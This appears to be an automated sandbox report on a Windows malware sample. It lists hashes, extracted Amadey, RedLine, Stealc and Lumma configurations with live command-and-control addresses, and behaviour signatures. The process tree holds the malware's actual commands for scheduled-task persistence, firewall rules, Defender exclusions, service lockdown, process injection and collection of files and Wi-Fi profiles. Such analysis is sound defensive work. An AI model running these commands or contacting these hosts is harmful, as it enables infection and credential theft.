Analysis

  • max time kernel
    92s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 15:37

General

  • Target

    a7520e97207fb16c2255f158ffec237fb4d312b7e4197505e8e645cd284e1af6.exe

  • Size

    1.8MB

  • MD5

    4f55934e495634b2c4a311d73b33bc46

  • SHA1

    7be9425e6da13c5da747427c45c38c8ef909165a

  • SHA256

    a7520e97207fb16c2255f158ffec237fb4d312b7e4197505e8e645cd284e1af6

  • SHA512

    4084993b3a859341cfaf0f4be7c226787e9c858867b98d311a5b4b683431fa338106525d27b35b176920b19bc9738a7f0c6adc79bdf69a09cce0ff8b54aca455

  • SSDEEP

    24576:6Y7SrqlgdDoeT4W2iiYoz82c+Xn+V3cm9jZM2eqCoJYIGVIz6KwsThoPNgP+:6YGrsgRoeTHu82c+uVteNqHQKzThoPg

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.225.183:30592

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 18 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 9 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 11 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a7520e97207fb16c2255f158ffec237fb4d312b7e4197505e8e645cd284e1af6.exe
    "C:\Users\Admin\AppData\Local\Temp\a7520e97207fb16c2255f158ffec237fb4d312b7e4197505e8e645cd284e1af6.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:4616
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3104
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:5772
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:2500
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 868
          3⤵
          • Program crash
          PID:1384
      • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
        "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4912
          • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:684
          • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5204
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            4⤵
              PID:5716
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:4972
          • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:864
          • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
            "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5284
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
              3⤵
              • Creates scheduled task(s)
              PID:1340
            • C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe
              "C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:5780
              • C:\Users\Admin\AppData\Local\Temp\is-49P8I.tmp\is-0782P.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-49P8I.tmp\is-0782P.tmp" /SL4 $13004A "C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe" 3710753 52224
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3404
                • C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
                  "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -i
                  5⤵
                  • Executes dropped EXE
                  PID:1384
                • C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe
                  "C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -s
                  5⤵
                  • Executes dropped EXE
                  PID:4704
          • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
            "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3204
          • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
            "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3092
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2836
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
            2⤵
            • Loads dropped DLL
            PID:2632
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
              3⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:640
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                4⤵
                  PID:3180
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\556644402199_Desktop.zip' -CompressionLevel Optimal
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5044
            • C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe
              "C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe"
              2⤵
              • Executes dropped EXE
              PID:2848
            • C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
              "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:712
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3152
                • C:\Users\Admin\Pictures\SKxhsQFVyRhWLSBZtiZTnXZ4.exe
                  "C:\Users\Admin\Pictures\SKxhsQFVyRhWLSBZtiZTnXZ4.exe"
                  4⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  PID:5056
                  • C:\Users\Admin\AppData\Local\Temp\u3wg.0.exe
                    "C:\Users\Admin\AppData\Local\Temp\u3wg.0.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1348
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1164
                      6⤵
                      • Program crash
                      PID:1064
                  • C:\Users\Admin\AppData\Local\Temp\u3wg.3.exe
                    "C:\Users\Admin\AppData\Local\Temp\u3wg.3.exe"
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:5172
                    • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                      "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                      6⤵
                        PID:464
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 1456
                      5⤵
                      • Program crash
                      PID:1420
                  • C:\Users\Admin\Pictures\TQSycEbNXFxSJmFpop9t4XXW.exe
                    "C:\Users\Admin\Pictures\TQSycEbNXFxSJmFpop9t4XXW.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2668
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5556
                    • C:\Users\Admin\Pictures\TQSycEbNXFxSJmFpop9t4XXW.exe
                      "C:\Users\Admin\Pictures\TQSycEbNXFxSJmFpop9t4XXW.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:4584
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:2176
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                          6⤵
                            PID:3180
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                              7⤵
                              • Modifies Windows Firewall
                              PID:2032
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:1628
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:1232
                          • C:\Users\Admin\Pictures\8hasC0wvPdAPkdQFt6QZWlvW.exe
                            "C:\Users\Admin\Pictures\8hasC0wvPdAPkdQFt6QZWlvW.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5528
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6096
                            • C:\Users\Admin\Pictures\8hasC0wvPdAPkdQFt6QZWlvW.exe
                              "C:\Users\Admin\Pictures\8hasC0wvPdAPkdQFt6QZWlvW.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:1536
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                  PID:5216
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                  6⤵
                                    PID:1344
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                      7⤵
                                      • Modifies Windows Firewall
                                      PID:1028
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                      PID:5388
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:5108
                                      • C:\Windows\rss\csrss.exe
                                        C:\Windows\rss\csrss.exe
                                        6⤵
                                          PID:3396
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            7⤵
                                              PID:3496
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                  PID:5044
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                7⤵
                                                • Creates scheduled task(s)
                                                PID:5288
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /delete /tn ScheduledUpdate /f
                                                7⤵
                                                  PID:4820
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  7⤵
                                                    PID:5492
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    7⤵
                                                      PID:3720
                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                      7⤵
                                                        PID:2940
                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                        7⤵
                                                        • Creates scheduled task(s)
                                                        PID:5000
                                                      • C:\Windows\windefender.exe
                                                        "C:\Windows\windefender.exe"
                                                        7⤵
                                                          PID:2088
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                            8⤵
                                                              PID:5184
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                9⤵
                                                                • Launches sc.exe
                                                                PID:3176
                                                    • C:\Users\Admin\Pictures\RaQZo7E9Ea07wxDMboQvHfLx.exe
                                                      "C:\Users\Admin\Pictures\RaQZo7E9Ea07wxDMboQvHfLx.exe"
                                                      4⤵
                                                      • Modifies firewall policy service
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • Drops file in System32 directory
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:1168
                                                    • C:\Users\Admin\Pictures\FZyrYyR9Bzg7BMdiDOZd7Jjf.exe
                                                      "C:\Users\Admin\Pictures\FZyrYyR9Bzg7BMdiDOZd7Jjf.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5200
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS1F0C.tmp\Install.exe
                                                        .\Install.exe /nxdidQZJ "385118" /S
                                                        5⤵
                                                        • Checks BIOS information in registry
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Enumerates system info in registry
                                                        PID:2860
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                          6⤵
                                                            PID:3472
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                              7⤵
                                                                PID:5720
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                  8⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4648
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                    9⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2528
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 15:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\IkoJZaW.exe\" em /ZUsite_idUaY 385118 /S" /V1 /F
                                                              6⤵
                                                              • Drops file in Windows directory
                                                              • Creates scheduled task(s)
                                                              PID:5460
                                                        • C:\Users\Admin\Pictures\Pbr6dH6cOOHSOPZoLxkmpTn1.exe
                                                          "C:\Users\Admin\Pictures\Pbr6dH6cOOHSOPZoLxkmpTn1.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:368
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS32A4.tmp\Install.exe
                                                            .\Install.exe /nxdidQZJ "385118" /S
                                                            5⤵
                                                            • Checks BIOS information in registry
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Enumerates system info in registry
                                                            PID:4012
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                              6⤵
                                                                PID:5444
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                  7⤵
                                                                    PID:4168
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                      8⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5068
                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                        9⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3696
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 15:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qpWEwUa.exe\" em /Tzsite_idneH 385118 /S" /V1 /F
                                                                  6⤵
                                                                  • Drops file in Windows directory
                                                                  • Creates scheduled task(s)
                                                                  PID:4048
                                                            • C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe
                                                              "C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe" --silent --allusers=0
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              PID:1652
                                                              • C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe
                                                                C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6b74e1d0,0x6b74e1dc,0x6b74e1e8
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:4508
                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\V1Pf1iDyXvGthIsvnbZgpXEi.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\V1Pf1iDyXvGthIsvnbZgpXEi.exe" --version
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:2700
                                                              • C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe
                                                                "C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1652 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419153833" --session-guid=1fcc00bc-a6ab-45cc-a5f4-3ce877adb971 --server-tracking-blob="ZDQxZDliM2IzZDI0YmZhN2IxYzg1ZTc1NWIzMzY3ZjQyZThiNjU1MTY5ZjQ5ZGFmOWVjNDg2NmI3ZTI4NmYwMzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTQxMTAxLjk1NTciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNWJhMWYyM2QtZDViYy00MGUxLWFlMGEtOWM1ZGE1Mjc4Yzg1In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7003000000000000
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Enumerates connected drives
                                                                PID:1156
                                                                • C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe
                                                                  C:\Users\Admin\Pictures\V1Pf1iDyXvGthIsvnbZgpXEi.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x248,0x2b0,0x6aabe1d0,0x6aabe1dc,0x6aabe1e8
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:5328
